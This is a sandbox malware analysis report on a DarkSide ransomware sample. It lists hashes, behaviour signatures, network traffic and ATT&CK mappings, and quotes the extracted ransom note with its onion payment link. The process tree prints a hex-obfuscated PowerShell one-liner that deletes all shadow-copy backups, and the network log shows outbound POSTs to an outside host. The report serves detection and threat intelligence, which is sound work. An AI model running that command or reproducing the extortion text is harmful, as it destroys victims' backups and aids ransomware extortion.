Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Resubmissions
25/03/2025, 15:11 UTC
250325-skmbpsxzaw 1025/03/2025, 15:06 UTC
250325-sg1d6a1px2 1025/03/2025, 15:01 UTC
250325-sd5jpsxyct 1025/03/2025, 14:56 UTC
250325-sbdcfaxxgs 1025/03/2025, 14:50 UTC
250325-r7ve6a1nv3 1025/03/2025, 14:46 UTC
250325-r5ab7sxwhx 1025/03/2025, 14:40 UTC
250325-r2c9paxwe1 1005/02/2025, 10:25 UTC
250205-mgcefaslhw 1005/02/2025, 10:17 UTC
250205-mbs51atmbk 1005/02/2025, 09:15 UTC
250205-k785zs1pfn 10Analysis
-
max time kernel
118s -
max time network
126s -
platform
windows7_x64 -
resource
win7-20241010-en -
resource tags
-
submitted
25/03/2025, 14:50 UTC
General
-
Target
RansomwareSamples/DarkSide_01_05_2021_30KB.exe
-
Size
30KB
-
MD5
f00aded4c16c0e8c3b5adfc23d19c609
-
SHA1
86ca4973a98072c32db97c9433c16d405e4154ac
-
SHA256
4d9432e8a0ceb64c34b13d550251b8d9478ca784e50105dc0d729490fb861d1a
-
SHA512
a2697c2b008af3c51db771ba130590e40de2b0c7ad6f18b5ba284edffdc7a38623b56bc24939bd3867a55a7d263b236e02d1f0d718a5d3625402f2325cbfbedf
-
SSDEEP
768:lXnIczxCbTRNl71wHpZQgYI1TQPB3aYJEOW:hIMxCXd1+pZQgYIxk3vJE
Score
10/10
Malware Config
Extracted
Path
C:\Users\Admin\README.83b4895b.TXT
Family
darkside
Ransom Note
----------- [ Welcome to DarkSide ] ------------->
What happend?
----------------------------------------------
Your computers and servers are encrypted, backups are deleted. We use strong encryption algorithms, so you cannot decrypt your data.
But you can restore everything by purchasing a special program from us - universal decryptor. This program will restore all your network.
Follow our instructions below and you will recover all your data.
What guarantees?
----------------------------------------------
We value our reputation. If we do not do our work and liabilities, nobody will pay us. This is not in our interests.
All our decryption software is perfectly tested and will decrypt your data. We will also provide support in case of problems.
We guarantee to decrypt one file for free. Go to the site and contact us.
How to get access on website?
----------------------------------------------
Using a TOR browser:
1) Download and install TOR browser from this site: https://torproject.org/
2) Open our website: http://darksidfqzcuhtk2.onion/OBB5DDMR8RB9DI2RYYF376YGBJAV2J4F2NXFEWPBSXY709MAA0MY7PMBBQJ0HVG3
When you open our website, put the following data in the input form:
Key:
5l5BZPnhuDEYAVqJR4MgValoWwML2OjDOtYwubDXeXGefcJDd4otfGdb9pJPrHW7Rt0XqdwabTWl9I5xhiHBsW6mg5BoqR4M2LZ0TI1hN4ifY7RVgRakjxxhhyImncWtgNb8LWtJlhn6cwtDLlsIjq0wAn8s7YsdzgTPPreHXEyFiFH1ozVIpZXV1mO5QXMZu16DNkFcXVIfdw5gPeSYjd3VAa7VlIH8IXgwCuza7YprCeDIOmvRqYK1jBH4s4nn0VyEHnWRndP7jNNUmat6FMhNzeKnLYGbMDRwmZR6iFdFX0Y3lhEWenDamVRchRSE5YwiL9LqTfkrnrswflssAB0SOcodZXRxG5HNItcitj3Za1NzC5fmBpdKN4jV01hMBG98ZEN8HMKeOdVxKtbAZP86K9IfBy8QcNrWLQ2hAeup6DD6KsG8R0Jj8czKTu4MDlGaxQMtPSycA0B6IzpPVV0Tbn9yWIIFH6y4mir71zDWbcPH3p5Hnr80gTnOFHXGzkGfrdy1bjn5H99zniLFFjchV8EEPMtgG2PwKF7NVQ9dTdlMBHWQpGc
!!! DANGER !!!
DO NOT MODIFY or try to RECOVER any files yourself. We WILL NOT be able to RESTORE them.
!!! DANGER !!!
URLs
http://darksidfqzcuhtk2.onion/OBB5DDMR8RB9DI2RYYF376YGBJAV2J4F2NXFEWPBSXY709MAA0MY7PMBBQJ0HVG3
Signatures
-
DarkSide
Targeted ransomware first seen in August 2020. Operators steal data to use as leverage.
-
Darkside family
-
Renames multiple (156) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
Credentials from Password Stores: Windows Credential Manager 1 TTPs
Suspicious access to Credentials History.
-
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Using powershell.exe command.
-
Sets desktop wallpaper using registry 2 TTPs 2 IoCs
-
UPX packed file 4 IoCs
Detects executables packed with UPX/modified UPX open source packer.
-
Browser Information Discovery 1 TTPs
Enumerate browser information.
-
System Location Discovery: System Language Discovery 1 TTPs 1 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
-
Modifies Control Panel 1 IoCs
-
Modifies registry class 5 IoCs
-
Modifies system certificate store 2 TTPs 2 IoCs
-
Suspicious behavior: EnumeratesProcesses 3 IoCs
-
Suspicious use of AdjustPrivilegeToken 24 IoCs
-
Suspicious use of WriteProcessMemory 4 IoCs
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exeC:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe bcdedit /set shutdown /r /f /t 21⤵
- Sets desktop wallpaper using registry
- System Location Discovery: System Language Discovery
- Modifies Control Panel
- Modifies registry class
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ep bypass -c "(0..61)|%{$s+=[char][byte]('0x'+'4765742D576D694F626A6563742057696E33325F536861646F77636F7079207C20466F72456163682D4F626A656374207B245F2E44656C65746528293B7D20'.Substring(2*$_,2))};iex $s"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
Network
-
DNScatsdegree.comRemote address:8.8.8.8:53Requestcatsdegree.comIN AResponsecatsdegree.comIN CNAME77980.bodis.com77980.bodis.comIN A199.59.243.228 -
POSThttps://catsdegree.com/Sv3fxsTvVEMRemote address:199.59.243.228:443RequestPOST /Sv3fxsTvVEM HTTP/1.1
Accept: */*
Connection: keep-alive
Accept-Encoding: gzip, deflate, br
Content-Type: text/plain
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:79.0) Gecko/20100101 Firefox/80.0
Host: catsdegree.com
Content-Length: 442
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Tue, 25 Mar 2025 14:52:00 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 1062
X-Request-Id: 5e6396bd-bfd5-470e-814d-1c84778fd63a
Cache-Control: no-store, max-age=0
Accept-Ch: sec-ch-prefers-color-scheme
Critical-Ch: sec-ch-prefers-color-scheme
Vary: sec-ch-prefers-color-scheme
X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_jn7WqeqShx+9bBCf60dL/nytfDYTFUvKJZ27ToXwnlNJBHzssdXOMt0JjmGL/AwU6JwWiIyrn80PYgb4Gq+zDA==
Set-Cookie: parking_session=5e6396bd-bfd5-470e-814d-1c84778fd63a; expires=Tue, 25 Mar 2025 15:07:00 GMT; path=/
Connection: close
-
DNSr11.o.lencr.orgRemote address:8.8.8.8:53Requestr11.o.lencr.orgIN AResponser11.o.lencr.orgIN CNAMEo.lencr.edgesuite.neto.lencr.edgesuite.netIN CNAMEa1887.dscq.akamai.neta1887.dscq.akamai.netIN A2.18.190.206a1887.dscq.akamai.netIN A2.18.190.198
-
GEThttp://r11.o.lencr.org/MFMwUTBPME0wSzAJBgUrDgMCGgUABBQaUrm0WeTDM5ghfoZtS72KO9ZnzgQUCLkRO6XQhRi06g%2BgrZ%2BGHo78OCcCEgOPD1N7%2F8lTTs3OnT7ZlAvvEw%3D%3DRemote address:2.18.190.206:80RequestGET /MFMwUTBPME0wSzAJBgUrDgMCGgUABBQaUrm0WeTDM5ghfoZtS72KO9ZnzgQUCLkRO6XQhRi06g%2BgrZ%2BGHo78OCcCEgOPD1N7%2F8lTTs3OnT7ZlAvvEw%3D%3D HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: r11.o.lencr.org
ResponseHTTP/1.1 200 OK
Server: nginx
Content-Type: application/ocsp-response
Content-Length: 504
ETag: "92A3DCC68E93C115CA84D3AFDF3A361C51D00D61AEB709765DF6F8B4C210E94D"
Last-Modified: Tue, 25 Mar 2025 14:14:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=21593
Expires: Tue, 25 Mar 2025 20:51:53 GMT
Date: Tue, 25 Mar 2025 14:52:00 GMT
Connection: keep-alive
-
DNStemisleyes.comRemote address:8.8.8.8:53Requesttemisleyes.comIN AResponse
-
POSThttps://catsdegree.com/HNUbiunHtmYARemote address:199.59.243.228:443RequestPOST /HNUbiunHtmYA HTTP/1.1
Accept: */*
Connection: keep-alive
Accept-Encoding: gzip, deflate, br
Content-Type: text/plain
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:79.0) Gecko/20100101 Firefox/80.0
Host: catsdegree.com
Content-Length: 238
Cache-Control: no-cache
Cookie: parking_session=5e6396bd-bfd5-470e-814d-1c84778fd63a
ResponseHTTP/1.1 200 OK
Date: Tue, 25 Mar 2025 14:52:27 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 1066
X-Request-Id: 1a4327c7-cb13-4626-aaae-141b8ac5fad5
Cache-Control: no-store, max-age=0
Accept-Ch: sec-ch-prefers-color-scheme
Critical-Ch: sec-ch-prefers-color-scheme
Vary: sec-ch-prefers-color-scheme
X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_znyRQ3TkcP/cBXTOcy4oBLL9q4ac1JOMNg/e2WLo3glyPYpqX3G8bfr+3j0+kBpHM1j7KdwtewYW+n5fUONYiQ==
Set-Cookie: parking_session=5e6396bd-bfd5-470e-814d-1c84778fd63a; expires=Tue, 25 Mar 2025 15:07:28 GMT
Connection: close
-
DNStemisleyes.comRemote address:8.8.8.8:53Requesttemisleyes.comIN AResponse
-
DNSwww.microsoft.comRemote address:8.8.8.8:53Requestwww.microsoft.comIN AResponsewww.microsoft.comIN CNAMEwww.microsoft.com-c-3.edgekey.netwww.microsoft.com-c-3.edgekey.netIN CNAMEwww.microsoft.com-c-3.edgekey.net.globalredir.akadns.netwww.microsoft.com-c-3.edgekey.net.globalredir.akadns.netIN CNAMEe13678.dscb.akamaiedge.nete13678.dscb.akamaiedge.netIN A23.192.18.101
-
GEThttp://www.microsoft.com/pkiops/crl/MicCodSigPCA2011_2011-07-08.crlRemote address:23.192.18.101:80RequestGET /pkiops/crl/MicCodSigPCA2011_2011-07-08.crl HTTP/1.1
Connection: Keep-Alive
Accept: */*
If-Modified-Since: Sun, 18 Aug 2024 00:23:49 GMT
User-Agent: Microsoft-CryptoAPI/6.1
Host: www.microsoft.com
ResponseHTTP/1.1 200 OK
Content-Length: 1078
Content-Type: application/octet-stream
Content-MD5: HqJzZuA065RHozzmOcAUiQ==
Last-Modified: Tue, 14 Jan 2025 20:41:31 GMT
ETag: 0x8DD34DBD43549F4
x-ms-request-id: 90d94cda-601e-004e-55c9-667962000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Tue, 25 Mar 2025 14:52:31 GMT
Connection: keep-alive
TLS_version: UNKNOWN
ms-cv: CASMicrosoftCV1b111006.0
ms-cv-esi: CASMicrosoftCV1b111006.0
X-RTag: RT
-
DNScrl.microsoft.comRemote address:8.8.8.8:53Requestcrl.microsoft.comIN AResponsecrl.microsoft.comIN CNAMEcrl.www.ms.akadns.netcrl.www.ms.akadns.netIN CNAMEa1363.dscg.akamai.neta1363.dscg.akamai.netIN A2.19.252.143
-
GEThttp://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crlRemote address:2.19.252.143:80RequestGET /pki/crl/products/MicRooCerAut2011_2011_03_22.crl HTTP/1.1
Connection: Keep-Alive
Accept: */*
If-Modified-Since: Thu, 26 Sep 2024 02:21:11 GMT
User-Agent: Microsoft-CryptoAPI/6.1
Host: crl.microsoft.com
ResponseHTTP/1.1 200 OK
Content-Length: 825
Content-Type: application/octet-stream
Content-MD5: O14L1mQEVqdJ2RVebBNXJw==
Last-Modified: Wed, 26 Feb 2025 21:48:51 GMT
ETag: 0x8DD56AF5BD2A499
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 47bdeae0-d01e-0029-409a-88699e000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Tue, 25 Mar 2025 14:52:31 GMT
Connection: keep-alive
-
199.59.243.228:443https://catsdegree.com/Sv3fxsTvVEMtls, http
HTTP Request
POST https://catsdegree.com/Sv3fxsTvVEMHTTP Response
200 -
2.18.190.206:80http://r11.o.lencr.org/MFMwUTBPME0wSzAJBgUrDgMCGgUABBQaUrm0WeTDM5ghfoZtS72KO9ZnzgQUCLkRO6XQhRi06g%2BgrZ%2BGHo78OCcCEgOPD1N7%2F8lTTs3OnT7ZlAvvEw%3D%3Dhttp
HTTP Request
GET http://r11.o.lencr.org/MFMwUTBPME0wSzAJBgUrDgMCGgUABBQaUrm0WeTDM5ghfoZtS72KO9ZnzgQUCLkRO6XQhRi06g%2BgrZ%2BGHo78OCcCEgOPD1N7%2F8lTTs3OnT7ZlAvvEw%3D%3DHTTP Response
200 -
199.59.243.228:443https://catsdegree.com/HNUbiunHtmYAtls, http
HTTP Request
POST https://catsdegree.com/HNUbiunHtmYAHTTP Response
200 -
23.192.18.101:80http://www.microsoft.com/pkiops/crl/MicCodSigPCA2011_2011-07-08.crlhttp
HTTP Request
GET http://www.microsoft.com/pkiops/crl/MicCodSigPCA2011_2011-07-08.crlHTTP Response
200 -
2.19.252.143:80http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crlhttp
HTTP Request
GET http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crlHTTP Response
200
-
8.8.8.8:53catsdegree.comdns
DNS Request
catsdegree.com
DNS Response
199.59.243.228
-
8.8.8.8:53r11.o.lencr.orgdns
DNS Request
r11.o.lencr.org
DNS Response
2.18.190.2062.18.190.198
-
8.8.8.8:53temisleyes.comdns
DNS Request
temisleyes.com
-
8.8.8.8:53temisleyes.comdns
DNS Request
temisleyes.com
-
8.8.8.8:53www.microsoft.comdns
DNS Request
www.microsoft.com
DNS Response
23.192.18.101
-
8.8.8.8:53crl.microsoft.comdns
DNS Request
crl.microsoft.com
DNS Response
2.19.252.143
MITRE ATT&CK Enterprise v15
Defense Evasion
Modify Registry
2Subvert Trust Controls
1Install Root Certificate
1Credential Access
Credentials from Password Stores
2Credentials from Web Browsers
1Windows Credential Manager
1Unsecured Credentials
1Credentials In Files
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
7KB
MD5f9773b3d4f105079d71fa14d362eca7b
SHA1161d2db78c298723b3501dbfbd4b73fa2f1ce439
SHA256c590a0d5e690e2cbd98acba4777abbeb3e76e68cb82c71d39e243922cad8b8d5
SHA51260e0956756f8ec0b7c28a06014805ff59aff2d25c527df35b7ccfcbb08ee5fedb40eb666e44f573c3cb65e3a78a10d99dd6bdef3c2d4bb88917a0006baa5542f
-
Filesize
1KB
MD5f418a249405444da33cc73b402a26306
SHA11a6c493e74036f93f0dae4b65e6c543c213ce418
SHA256b348457b3cd38a91d113b0dfbf5bdf9d830b39f5ab849b126fff027534ef2e09
SHA512b848dd2bb5654aac30d36279af1b9460b36c2df9c8f696d5349a870cd9be8b0aac203623c2025e8b32e646b0558ee27cf72e04db6aee3a2cd548d5c29575efaf
-
Filesize
9.6MB
-
Filesize
9.6MB
-
Filesize
9.6MB
-
Filesize
9.6MB
-
Filesize
9.6MB
-
Filesize
9.6MB
-
Filesize
4KB
-
Filesize
2.9MB
-
Filesize
4KB
-
Filesize
9.6MB
-
Filesize
32KB
-
Filesize
92KB
-
Filesize
92KB
-
Filesize
92KB
-
Filesize
92KB